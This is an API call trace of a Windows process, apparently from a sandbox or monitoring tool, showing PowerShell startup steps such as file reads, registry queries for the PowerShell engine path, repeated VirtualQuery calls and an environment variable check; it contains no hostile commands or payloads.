[0077.875] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.875] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.875] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.876] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.876] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.876] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.877] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.877] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.877] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.877] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.877] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.877] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.878] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.880] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.880] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.881] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.882] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.882] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.882] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.882] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.882] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.882] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1b4, lpOverlapped=0x0) returned 1
[0077.883] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x0, lpOverlapped=0x0) returned 1
[0077.883] CloseHandle (hObject=0x334) returned 1
[0077.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.883] SetErrorMode (uMode=0x1) returned 0x1
[0077.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1e0 | out: lpFileInformation=0x16d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
[0077.893] SetErrorMode (uMode=0x1) returned 0x1
[0077.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2c8 | out: phkResult=0x16d2c8*=0x334) returned 0x0
[0077.893] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d24c, lpData=0x0, lpcbData=0x16d248*=0x0 | out: lpType=0x16d24c*=0x1, lpData=0x0, lpcbData=0x16d248*=0x56) returned 0x0
[0077.893] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f5870
[0077.893] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d21c, lpData=0x1b7f5870, lpcbData=0x16d218*=0x56 | out: lpType=0x16d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d218*=0x56) returned 0x0
[0077.893] CoTaskMemFree (pv=0x1b7f5870)
[0077.893] RegCloseKey (hKey=0x334) returned 0x0
[0077.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0078.730] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.815] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.816] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.816] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.816] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.816] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.817] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.818] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.850] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.850] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.850] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.851] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.851] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.852] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.852] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.852] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.857] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.864] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.864] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.864] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.864] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.865] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.865] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.865] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.866] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.866] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.866] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.866] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.866] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.867] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.868] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.870] VirtualQuery (in: lpAddress=0x16bfc0, lpBuffer=0x16ce80, dwLength=0x30 | out: lpBuffer=0x16ce80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.870] VirtualQuery (in: lpAddress=0x16bfc0, lpBuffer=0x16ce80, dwLength=0x30 | out: lpBuffer=0x16ce80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.871] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.872] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.089] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.090] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.090] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.092] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0079.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.092] CoTaskMemFree (pv=0x256670)
[0079.140] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.185] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.185] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.185] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.185] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.186] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.186] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.187] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.204] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.205] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x308) returned 0x0
[0079.205] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x16d47c, lpData=0x0, lpcbData=0x16d478*=0x0 | out: lpType=0x16d47c*=0x1, lpData=0x0, lpcbData=0x16d478*=0x74) returned 0x0
[0079.205] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x74) returned 0x0
[0079.205] CoTaskMemAlloc (cb=0x78) returned 0x28e010
[0079.205] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x16d3bc, lpData=0x28e010, lpcbData=0x16d3b8*=0x74 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d3b8*=0x74) returned 0x0
[0079.205] CoTaskMemFree (pv=0x28e010)
[0079.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
